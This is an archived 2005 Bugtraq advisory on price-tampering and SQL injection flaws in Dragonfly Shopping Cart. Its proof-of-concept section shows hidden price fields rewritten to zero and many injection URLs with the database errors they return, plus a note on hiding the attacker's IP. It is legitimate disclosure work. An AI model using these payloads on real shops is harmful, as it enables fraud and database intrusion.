lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 12 Jul 2005 08:53:52 -0000
From: dcrab@...kerscenter.com
To: bugtraq@...urityfocus.com
Subject: Dragonfly Shopping Cart Multiple vulnerabilities


Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: Dragonfly Shopping Cart Multiple vulnerabilities
Date: 11/07/2005

Vendor: DragonFly Shopping Cart
Vendor Website: http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=5
Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow modifiying of prices along with Sql injection vulnerabilities.

Proof of Concept Exploits:

Hidden Price Value Vulnerability
You can modify these fields to modify the price of the product and thus be able to purchase the biggest and most expensive products for the cheapest possible prices, or even nothing.
/demo/dc_Categorieslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="15.49" size="4">



/demo/dc_Categoriesview.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">



/demo/dc_productslist.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">



/demo/dc_productslist_Clearance.asp
HPVV

<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">


There are also many other hidden fields like ip address etc which can be used to make the attack "technically" more anonymous though any normal logging system would catch you ;).



Sql Injections

/demo/dc_Categoriesview.asp??key='&RecPerPage=5

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_Categoriesview.asp, line 1054 



/demo/dc_Categoriesview.asp?key=%26dir%26
Microsoft JET Database Engine error '80040e14' 

Syntax error (missing operator) in query expression '[CategoryKey] = &dir&'. 

/demo/dc_Categoriesview.asp, line 1054 



/demo/dc_productslist_Clearance.asp

Microsoft JET Database Engine error '80040e14' 

Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'. 

/demo/dc_productslist_Clearance.asp, line 292 



/demo/dc_productslist_Clearance.asp?cmd=%27

Microsoft JET Database Engine error '80040e14' 

Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'. 

/demo/dc_productslist_Clearance.asp, line 292 



/demo/ratings.asp??PID='

Microsoft JET Database Engine error '80040e14' 

Syntax error (missing operator) in query expression '[ProductKey]=''. 

/demo/ratings.asp, line 68 



/demo/dc_Productsview.asp

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_Productsview.asp, line 931 



/demo/dc_forum_Postslist.asp?start='

Microsoft VBScript runtime error '800a000d' 

Type mismatch: 'nTotalRecs' 

/demo/dc_forum_Postslist.asp, line 319 



/demo/dc_forum_Postslist.asp?key_m='

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_forum_Postslist.asp, line 200 



/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_forum_Postslist.asp, line 200 



/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1

Microsoft JET Database Engine error '80040e07' 

Data type mismatch in criteria expression. 

/demo/dc_forum_Postslist.asp, line 200 


Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure coding with php.

Powered by blists - more mailing lists